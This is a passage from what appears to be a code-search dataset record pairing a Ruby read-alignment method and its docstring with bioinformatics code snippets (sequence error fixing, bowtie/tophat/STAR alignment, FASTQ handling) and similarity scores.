\"Attempting to fix gag at position #{gag.position} in sequence #{seq_id}, which is #{seq.length} bases long\"\n fixed = fixed+seq[last_gag..(gag.position-1)]\n fixed = fixed+seq[(gag.position-1)..(gag.position-1)]\n last_gag = gag.position\n #log.debug \"After fixing gag at position #{gag.position}, fixed sequence is now #{fixed}\"\n end\n fixed = fixed+seq[last_gag..(seq.length-1)]\n fixed_sequences[seq_id] = fixed\n end\n end\n \n unless accounted_for_seq_ids.length == sequence_id_to_gags.length\n log.warn \"Unexpectedly found GAG errors in sequences that weren't in the sequence that are to be fixed: Found gags in #{sequence_id_to_gags.length}, but only fixed #{accounted_for_seq_ids.length}\"\n end\n return fixed_sequences\n end",
"def initialize(options = {})\n super\n @queue_values = {}\n @key_assignments = {}\n @largest_seen_values = {}\n @smallest_seen_values = {}\n @rng_seed = options[:rng_seed] || Random.new_seed\n end",
"def initializeResultVariables()\n @totalReadsProduced = 0 # Total reads\n @numDuplicateReads = 0 # Num. duplicate reads\n @perDuplicateReads = 0 # Percentage of duplicate reads\n @numAlignedReads = 0 # Num. of reads aligned\n @perAlignedReads = 0 # Percentage of reads aligned\n @numReadsPaired = 0 # Total pairs of reads\n @numReadAndMatePaired = 0 # Read pairs with mapped mates\n @numBufferAlignedReads = 0 # Num. reads aligned on buffer\n @perBufferAlignedReads = 0 # Percentage of reads aligned on buffer\n @numTargetAlignedReads = 0 # Num. reads aligned on target\n @perTargetAlignedReads = 0 # Percentage of reads aligned on target\n @avgCoverage = 0 # Average coverage\n @numReadsTargetBuffer = 0 # Num. reads hitting target or buffer\n @perReadsTargetBuffer = 0 # Percentage of reads hitting target or buffer\n @totalExpAlignedReads = 0 # Total expected number of aligned reads\n @totalCalcAlignedReads = 0 # Total calculated number of aligned reads \n @numTargetsHit = 0 # Number of targets hit\n @perTargetsHit = 0 # Percentage of targets hit\n @numTargetBuffersHit = 0 # Num. target buffers hit\n @perTargetBuffersHit = 0 # Percentage of target buffers hit\n @numTotalTargets = 0 # Number of total targets\n @numNonTarget = 0 # Number of non-target hits with high coverage\n @numTargetedBases = 0 # Number of bases targeted\n @numBufferBases = 0 # Number of buffer bases\n @numBases1Coverage = 0 # Num. bases with 1+ coverage\n @perBases1Coverage = 0 # Percentage of bases with 1+ coverage\n @numBases4Coverage = 0 # Percentage of bases with 4+ coverage\n @perBases4Coverage = 0 # Percentage of bases with 4+ coverage\n @numBases10Coverage = 0 # Num. bases with 10+ coverage\n @perBases10Coverage = 0 # Percentage of bases with 10+ coverage\n @numBases20Coverage = 0 # Num. bases with 20+ coverage\n @perBases20Coverage = 0 # Percentage of bases with 20+ coverage\n @numBases40Coverage = 0 # Percentage of bases with 40+ coverage\n @perBases40Coverage = 0 # Percentage of bases with 40+ coverage\n end",
"def default_job_params\n {\n rna_extraction_kit: QIAampDSPViralRNAMiniKit::NAME\n }\n end",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation succeded.\"\t\n\tend",
"def a3g_hypermut(ref = nil)\n # mut_hash number of apobec3g/f mutations per sequence\n mut_hash = {}\n hm_hash = {}\n out_hash = {}\n\n # total G->A mutations at apobec3g/f positions.\n total = 0\n\n unless ref \n # make consensus sequence for the input sequence hash\n ref = self.consensus\n end\n\n # obtain apobec3g positions and control positions\n apobec = apobec3gf(ref)\n mut = apobec[0]\n control = apobec[1]\n\n self.dna_hash.each do |k,v|\n a = 0 # muts\n b = 0 # potential mut sites\n c = 0 # control muts\n d = 0 # potenrial controls\n mut.each do |n|\n if v[n] == \"A\"\n a += 1\n b += 1\n else\n b += 1\n end\n end\n mut_hash[k] = a\n total += a\n\n control.each do |n|\n if v[n] == \"A\"\n c += 1\n d += 1\n else\n d += 1\n end\n end\n rr = (a/b.to_f)/(c/d.to_f)\n\n t1 = b - a\n t2 = d - c\n\n fet = ViralSeq::Rubystats::FishersExactTest.new\n fisher = fet.calculate(t1,t2,a,c)\n perc = fisher[:twotail]\n info = [k, a, b, c, d, rr.round(2), perc]\n out_hash[k] = info\n if perc < 0.05\n hm_hash[k] = info\n end\n end\n\n if self.dna_hash.size > 200\n rate = total.to_f/(self.dna_hash.size)\n count_mut = mut_hash.values.count_freq\n maxi_count = count_mut.values.max\n poisson_hash = ViralSeq::Math::PoissonDist.new(rate,maxi_count).poisson_hash\n cut_off = 0\n poisson_hash.each do |k,v|\n cal = self.dna_hash.size * v\n obs = count_mut[k]\n if obs >= 20 * cal\n cut_off = k\n break\n elsif k == maxi_count\n cut_off = maxi_count\n end\n end\n mut_hash.each do |k,v|\n if v > cut_off\n hm_hash[k] = out_hash[k]\n end\n end\n end\n\n hm_seq_hash = ViralSeq::SeqHash.new\n hm_hash.each do |k,_v|\n hm_seq_hash.dna_hash[k] = self.dna_hash[k]\n end\n \n hm_seq_hash.title = self.title + \"_hypermut\"\n hm_seq_hash.file = self.file\n filtered_seq_hash = self.sub(self.dna_hash.keys - hm_hash.keys)\n return { a3g_seq: hm_seq_hash,\n filtered_seq: filtered_seq_hash,\n stats: hm_hash.values\n }\n end",
"def initialize(number)\n @range = (1..number)\n # Now the behavior of the robot is being driven\n # by configuration data! And there's just one\n # place we can change to change behavior. :)\n @format_data = { \"fuzz\" => 3, \"bizz\" => 5 }\n end",
"def initialize phenotype_count, orthogroup_count, storage_count\n # Make sure to provide storage_count + phenotype_count as the initial capacity, since otherwise a resize will be needed.\n super([phenotype_count, orthogroup_count], 0, capacity: storage_count+phenotype_count+1, stype: :yale, dtype: :byte)\n @skip_table = {}\n end",
"def compute\n index(@ref, @ref_base, @software, @annotation)\n\n if @err_rate > 0\n bucketized_alignment\n else # software == :star || err_rate == 0\n unbucketized_alignment\n end\n end",
"def scan_gene_blo_seqs\n GeneBloSeq.destroy_all\n\n genes = Gene.find(:all)\n\n genes.each { |gn|\n\n #assemble gene file location\n gene_blo_runs_f = \"#{AppConfig.gene_blo_runs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_f = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_p = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.phy\"\n\n \n gene_blo_runs_oa = @ud.fastafile_to_original_alignment(gene_blo_runs_f)\n gene_blo_seqs_oa = Bio::Alignment::OriginalAlignment.new\n\n\n\n puts \"gn.seqs_orig_nb:#{gn.seqs_orig_nb} oa_size: #{gene_blo_runs_oa.size}\"\n\n #schould be equal\n #should insert assertion here or make an rspec to detect source\n #puts oa.keys\n\n gene_blo_runs_oa.each_pair { |key, seq|\n puts key, seq\n gbs = GeneBloSeq.new\n #find corresponding gi\n ns = NcbiSeq.find_by_vers_access(key)\n #link to objects gene and gi\n gbs.gene = gn\n gbs.ncbi_seq = ns\n gbs.save\n gene_blo_seqs_oa.add_seq(seq,ns.id)\n\n }\n \n #save fasta file \n @ud.string_to_file(gene_blo_seqs_oa.output(:fasta),gene_blo_seqs_f)\n #save phylip file\n @ud.string_to_file(gene_blo_seqs_oa.output(:phylip),gene_blo_seqs_p)\n\n\n\n\n }\n\n end",
"def initialize(num_legs)\n\t\t@tabletop = []\n @num_legs = num_legs\n \tend",
"def align=(_arg0); end",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation finished.\"\t\n\tend",
"def initialize ( params = {})\r\n @parent1 = params.fetch(:p1,\"xxx\")\r\n @parent2 = params.fetch(:p2,\"xxx\")\r\n @f2_wild = params.fetch(:f2wild,\"xxx\")\r\n @f2_p1 = params.fetch(:f2p1,\"xxx\")\r\n @f2_p2 = params.fetch(:f2p2,\"xxx\")\r\n @f2_p1p2 = params.fetch(:f2p1p2,\"xxx\")\r\n \r\n\r\n @@almacen[parent1]=self \r\n end"
] |
[
"0.52725923",
"0.5269229",
"0.5243173",
"0.515901",
"0.51487947",
"0.50884366",
"0.5077564",
"0.49884474",
"0.49591947",
"0.49542058",
"0.4874891",
"0.4868386",
"0.48597658",
"0.48050168",
"0.47810596",
"0.475977",
"0.47541583",
"0.4708687",
"0.4702784",
"0.47009873",
"0.4695017",
"0.46896684",
"0.46887237",
"0.4688386",
"0.4654672",
"0.4651437",
"0.46494",
"0.4630566",
"0.46213827",
"0.46120042",
"0.46105674",
"0.4609967",
"0.46021792",
"0.45927027",
"0.45919967",
"0.45844275",
"0.45818254",
"0.45790872",
"0.457898",
"0.45782483",
"0.45782483",
"0.45782483",
"0.4577523",
"0.45688742",
"0.45599958",
"0.45518917",
"0.45438188",
"0.4541336",
"0.4538555",
"0.45382866",
"0.4513586",
"0.45130613",
"0.45074013",
"0.45066732",
"0.44985506",
"0.44942066",
"0.44927147",
"0.44777802",
"0.44759578",
"0.44602448",
"0.44564822",
"0.44561324",
"0.4455113",
"0.44545588",
"0.44407436",
"0.4438085",
"0.44376147",
"0.44350573",
"0.44341657",
"0.44250584",
"0.44223714",
"0.44140095",
"0.4409323",
"0.44005615",
"0.44001326",
"0.4387706",
"0.43856826",
"0.43653738",
"0.4361151",
"0.43513563",
"0.43497908",
"0.43477443",
"0.43450513",
"0.4342425",
"0.43396828",
"0.43311048",
"0.43310705",
"0.43283108",
"0.4324153",
"0.43125957",
"0.43111324",
"0.43105653",
"0.43079716",
"0.4305842",
"0.43041614",
"0.4294729",
"0.42875984",
"0.42858127",
"0.4285046",
"0.42817554"
] |
0.6461289
|
0
|
Performs genomic alignment. As Tophat does only allow for an absolute number of errors, reads will be split into several files according to
|
def compute
index(@ref, @ref_base, @software, @annotation)
if @err_rate > 0
bucketized_alignment
else # software == :star || err_rate == 0
unbucketized_alignment
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def process_alignment\n # init vars\n @names = []\n @seqs = []\n \n @alignment = \"-B #{@basename}.aln\"\n\n # import alignment file\n @content = IO.readlines(@infile).map {|line| line.chomp}\n \n #check alignment for gap-only columns\n remove_inserts\n \n #write query-file\n File.open(@infile, \"w\") do |file|\n file.write(\">#{@names[0]}\\n\")\n file.write(\"#{@seqs[0]}\\n\")\n end\n \n #write aln-file\n File.open(@basename + \".aln\", \"w\") do |file|\n @names.each_index do |num|\n file.write(\"Sequence#{num} \")\n file.write(\" \") if (num < 10)\n file.write(\" \") if (num < 100)\n file.write(\"#{@seqs[num]}\\n\")\n end\n end\n end",
"def run_align_assess\n filename = self.generate_fasta_alignment_file_for_all\n string = \"./lib/AlignAssess_wShorterID #{filename} P\"\n seq_array = Array.new\n if system(string)\n seq_id_array = self.sequences.map{|s| s.seq_id}\n new_filename = filename + \"_assess\"\n f = File.new(new_filename, \"r\")\n flag = false\n read_row= 999999999\n cur_row = 0\n while (line = f.gets)\n if cur_row > read_row && flag\n if line == \"\\n\"\n flag =false\n else\n seq_array << line.split(\"\\t\")\n end\n elsif line == \"Pair-wise %ID over shorter sequence:\\n\"\n flag=true\n read_row = cur_row + 2\n end\n cur_row +=1\n end\n range = seq_array.length - 1\n #seq_array.each do |row|\n for row_num in 0..range\n for i in 1..range#(row_num) \n PercentIdentity.first_or_create(:seq1_id=>seq_id_array[row_num],\n :seq2_id=>seq_id_array[i],\n :alignment_name => self.alignment_name,\n :percent_id=>seq_array[row_num][i])\n # print \"[#{row_num}:#{i-1}=>#{row[i]}],\"\n end\n #print \"\\n\"\n end\n end\n end",
"def genome(liszt)\n=begin\n[samopen] SAM header is present: 2 sequences\n7621912 reads; of these:\n 4009241 (52.60%) were paired; of these:\n 1983557 (49.47%) aligned concordantly 0 times\n 1818685 (45.36%) aligned concordantly exactly 1 time\n 206999 (5.16%) aligned concordantly >1 times\n ----\n 1983557 pairs aligned concordantly 0 times; of these:\n 409503 (20.64%) aligned discordantly 1 time\n ----\n 1574054 pairs aligned 0 times concordantly or discordantly; of these:\n 3148108 mates make up the pairs; of these:\n 1009275 (32.06%) aligned 0 times\n 35392 (1.12%) aligned exactly 1 time\n 2103441 (66.82%) aligned >1 times\n 3612671 (47.40%) were unpaired; of these:\n 498719 (13.80%) aligned 0 times\n 2246121 (62.17%) aligned exactly 1 time\n 867831 (24.02%) aligned >1 times\n=end\n #puts(liszt);exit\n dict={}; liszt.shift\n dict[\"total\"]=liszt.shift.split[0]; #liszt.shift\n dict[\"paired\"]=liszt.shift.split[0]; liszt.shift #conc 0\n dict[\"conc_once\"]=liszt.shift.split[0]\n dict[\"conc_mult\"]=liszt.shift.split[0]\n liszt.shift(2); dict[\"disc_once\"]=\"\"; dict[\"disc_mult\"]=\"\"\n line=liszt.shift\n line.include?(\">1 times\") ? dict[\"disc_mult\"]=line.split[0] : dict[\"disc_once\"]=line.split[0]\n liszt.shift\n dict[\"unaligned_pairs\"]=liszt.shift.split[0]\n liszt.shift\n dict[\"unmates\"]=liszt.shift.split[0] #unaligned mates\n dict[\"mate_once\"]=liszt.shift.split[0]\n dict[\"mate_mult\"]=liszt.shift.split[0]\n dict[\"unpaired\"]=liszt.shift.split[0]\n dict[\"unpair_unaligned\"]=liszt.shift.split[0]\n dict[\"unpair_once\"]=liszt.shift.split[0]\n dict[\"unpair_mult\"]=liszt.shift.split[0]\n dict\nend",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def align\n @genome = Genome.find(params[:id])\n @proteins = Protein.all\n @method = params[:method]\n\n if params[:method] == 'local'\n @message = 'Local alignment'\n align_all_local\n elsif params[:method] == 'global'\n @message = 'Global alignment'\n align_all_global\n end\n\n end",
"def bucketized_alignment\n # split reads into buckets according to their size and err_rate\n @buckets = bucketize(@err_rate)\n\n # perform alignment on each bucket\n @buckets.reverse_each do |lower, upper, mismatches|\n @names.set_bucket(lower, upper)\n mapped, unmapped = align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: mismatches\n }\n )\n @mapped_bams << mapped\n @unmapped_bams << unmapped\n @max_mismatches = [@max_mismatches, mismatches].max\n end\n\n # merge alignments\n @names.unset_bucket\n unbucketize(@mapped_bams, @names.get('mapped_merged'))\n unbucketize(@unmapped_bams, @names.get('unmapped_merged'))\n end",
"def scan_gene_blo_seqs\n GeneBloSeq.destroy_all\n\n genes = Gene.find(:all)\n\n genes.each { |gn|\n\n #assemble gene file location\n gene_blo_runs_f = \"#{AppConfig.gene_blo_runs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_f = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_p = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.phy\"\n\n \n gene_blo_runs_oa = @ud.fastafile_to_original_alignment(gene_blo_runs_f)\n gene_blo_seqs_oa = Bio::Alignment::OriginalAlignment.new\n\n\n\n puts \"gn.seqs_orig_nb:#{gn.seqs_orig_nb} oa_size: #{gene_blo_runs_oa.size}\"\n\n #schould be equal\n #should insert assertion here or make an rspec to detect source\n #puts oa.keys\n\n gene_blo_runs_oa.each_pair { |key, seq|\n puts key, seq\n gbs = GeneBloSeq.new\n #find corresponding gi\n ns = NcbiSeq.find_by_vers_access(key)\n #link to objects gene and gi\n gbs.gene = gn\n gbs.ncbi_seq = ns\n gbs.save\n gene_blo_seqs_oa.add_seq(seq,ns.id)\n\n }\n \n #save fasta file \n @ud.string_to_file(gene_blo_seqs_oa.output(:fasta),gene_blo_seqs_f)\n #save phylip file\n @ud.string_to_file(gene_blo_seqs_oa.output(:phylip),gene_blo_seqs_p)\n\n\n\n\n }\n\n end",
"def split_refseq\n # prepare output files\n system(%Q[cut -f4 #{$prepare_dir}/refseq_genes_result.tsv | cut -c1-5 | sort | uniq > #{$prepare_dir}/refp_prefix_list.txt ]) # get exist prefix list of protein_id\n FileUtils.mkdir_p(\"#{$prepare_dir}/refp\") unless File.exist?(\"#{$prepare_dir}/refp\")\n refp_output = {}\n File.open(\"#{$prepare_dir}/refp_prefix_list.txt\") do |f|\n f.each_line do |line|\n prefix = line.chomp.strip\n refp_output[prefix] = File.open(\"#{$prepare_dir}/refp/#{prefix}.dat\", \"w\")\n end\n end\n refp_output[\"no_protein_id\"] = File.open(\"#{$prepare_dir}/refp/no_protein_id.dat\", \"w\") # protein_id is optional\n\n File.open(\"#{$prepare_dir}/refseq_genes_result.tsv\") do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n prefix = (columns[3].nil? || columns[3] == \"\") ? \"no_protein_id\" : columns[3][0..4] # protein_id is optional\n refp_output[prefix].puts line.chomp.strip\n end\n end\n refp_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped reads into fastq-format.\"\t\n\tend",
"def align_compressed_reads_to_human_genome_reference_using_bowtie\n\t\tputs \"step 7 align compressed reads to human genome reference using bowtie\"\n\t\tfiles.each_pair do |k,v|\n\t\t\t#\tbowtie's verbose is RIDICULOUS!\n\t\t\t#\tIt prints WAY too much and adds WAY too much time.\n\t\t\t#\t\t\t\t\"--verbose \"<<\n\t\t\tcommand = \"bowtie -n #{bowtie_mismatch} -p #{bowtie_threads} -f \" <<\n\t\t\t\t\"-S #{bowtie_index_human} compress_#{k}lane.fa compress_#{k}lane.sam\"\n\t\t\tcommand.execute\n\t\t\t\"compress_#{k}lane.sam\".file_check(die_on_failed_file_check) #\tthe reads that DIDN'T align?\tNO\n\n\t\t\t\"sam2names.rb compress_#{k}lane.sam bowtie_#{k}lane.names\".execute\n\t\t\t\"bowtie_#{k}lane.names\".file_check(die_on_failed_file_check)\n\t\tend\n\n\t\tpull_reads_from_fastas(\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.names\" },\n\t\t\tfiles.keys.sort.collect{|k| \"compress_#{k}lane.fa\" },\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.fa\" })\n\n#\n#\tThis script has fixed input of chopped_leftlane.psl (and right or single)\n#\tBAD. BAD. BAD.\tTODO\n#\tThis is only informative and nothing uses the output\n#\tso could be commented out.\n#\n#\n#\tTODO Replaced with ruby version, but still in development\n#\n#\n#\t\tcommand = \"candidate_non_human.rb \"\n#\t\t#\tfiles is a hash and the keys are not guaranteed to be sorted\n#\t\t#\tsort alphabetically and left is first, right is last (conveniently)\n#\t\tfiles.keys.sort.each{|k| command << \"bowtie_#{k}lane.names \" }\n#\t\tcommand.execute\n#\t\tfile_check( \"candidate_non_human.txt\" )\n\tend",
"def generate_alignment\n raise ArgumentError, 'Missing genome FASTA file.' unless @genome_file\n raise ArgumentError, 'Missing transcripts FASTA file.' unless @transcripts_file\n \n # Prepare the BLAT alignment\n blat = Alignment::BLAT.new(@blat_options.merge({ out_format: :tab, database: @genome_file }))\n \n # Optionally set a permanent file to write the results to\n @alignment_file ||= \"#{@transcripts_file}.alignment\"\n blat.output_file = @alignment_file\n \n puts \"Running BLAT alignment...\" if @verbose\n \n # Run\n result_file = blat.run(@transcripts_file)\n result_file.path\n end",
"def fix_gags(hash_of_sequence_ids_to_sequence_strings, sequence_id_to_gags={})\n log = Bio::Log::LoggerPlus['bio-gag']\n \n # Get the gags\n if sequence_id_to_gags == {}\n log.info \"Predicting gags from the pileup\"\n gags do |gag|\n sequence_id_to_gags[gag.ref_name] ||= []\n sequence_id_to_gags[gag.ref_name].push gag\n end\n else\n log.info \"Using pre-specified GAG errors\"\n end\n log.info \"Found #{sequence_id_to_gags.values.flatten.length} gag errors to fix\"\n \n # Make sure all gag errors in the pileup map to a sequence input fasta file by keeping tally\n accounted_for_seq_ids = []\n fixed_sequences = {} #Hash of sequence ids to sequences without gag errors\n hash_of_sequence_ids_to_sequence_strings.each do |seq_id, seq|\n log.debug \"Now attempting to fix sequence #{seq_id}, sequence #{seq}\"\n toilet = sequence_id_to_gags[seq_id]\n if toilet.nil?\n # No gag errors found in this sequence (or pessimistically the sequence wasn't in the pileup -leaving that issue to the user though)\n fixed_sequences[seq_id] = seq\n else\n # Gag error found at least once somewhere in this sequence\n # Record that this was touched in the pileup\n accounted_for_seq_ids.push seq_id\n \n # Output the fixed-up sequence\n last_gag = 0\n fixed = ''\n toilet.sort{|a,b| a.position<=>b.position}.each do |gag|\n #log.debug \"Attempting to fix gag at position #{gag.position} in sequence #{seq_id}, which is #{seq.length} bases long\"\n fixed = fixed+seq[last_gag..(gag.position-1)]\n fixed = fixed+seq[(gag.position-1)..(gag.position-1)]\n last_gag = gag.position\n #log.debug \"After fixing gag at position #{gag.position}, fixed sequence is now #{fixed}\"\n end\n fixed = fixed+seq[last_gag..(seq.length-1)]\n fixed_sequences[seq_id] = fixed\n end\n end\n \n unless accounted_for_seq_ids.length == sequence_id_to_gags.length\n log.warn \"Unexpectedly found GAG errors in sequences that weren't in the sequence that are to be fixed: Found gags in #{sequence_id_to_gags.length}, but only fixed #{accounted_for_seq_ids.length}\"\n end\n return fixed_sequences\n end",
"def align(ref, ref_base, software, opts = {})\n if software == :tophat\n bt_flag =\n opts[:tophat_aligner] == :bowtie1 ? '--bowtie1' : ''\n gap_flag =\n opts[:mismatches] < 2 ? \"--read-gap-length #{opts[:mismatches]}\" : ''\n end\n\n aln_cmd = {\n bowtie1:\n 'bowtie' \\\n \" --seedlen=#{opts[:seedlen]} #{ref_base}\" \\\n \" --un=#{@names.get('fp')}\" \\\n \" -q #{@names.get('trim')} \" \\\n \" --sam #{@names.get('ncrna')}\",\n bowtie2:\n 'bowtie2' \\\n \" --un #{@names.get('fp')}\" \\\n \" -x #{ref_base}\" \\\n \" -L #{opts[:seedlen]}\" \\\n \" -U #{@names.get('trim')}\" \\\n \" -S #{@names.get('ncrna')}\",\n bwa:\n 'bwa mem' \\\n \" -k #{opts[:seedlen]}\" \\\n \" #{ref} \" \\\n \" #{@names.get('trim')} \" \\\n \"| samtools view -b - > #{@names.get('ncrna')} \" \\\n '&& bam2fastq' \\\n \" -o #{@names.get('fp')}\" \\\n \" --no-aligned #{@names.get('ncrna')}\",\n tophat:\n 'tophat' \\\n \" --read-edit-dist #{opts[:mismatches]}\" \\\n \" #{bt_flag}\" \\\n \" -N #{opts[:mismatches]}\" \\\n \" --output-dir #{@names.get('topout')}\" \\\n ' --no-novel-juncs' \\\n \" #{gap_flag}\" \\\n \" --GTF #{opts[:annotation]}\" \\\n \" #{ref_base} #{@names.get('fp')}\",\n star:\n 'STAR' \\\n \" --genomeDir #{ref_base}\" \\\n \" --outFilterMismatchNmax #{opts[:mismatches]}\" \\\n \" --readFilesIn #{@names.get('fp')}\"\\\n \" --outFileNamePrefix #{@names.get('mapped_all')}\"\n }\n\n target =\n opts[:seedlen].nil? ? @names.get('mapped_all') : @names.get('fp')\n run_cmd(aln_cmd[software]) unless skip_step?(target, 'aligning')\n [@names.get('mapped_all'), @names.get('unmapped')]\n end",
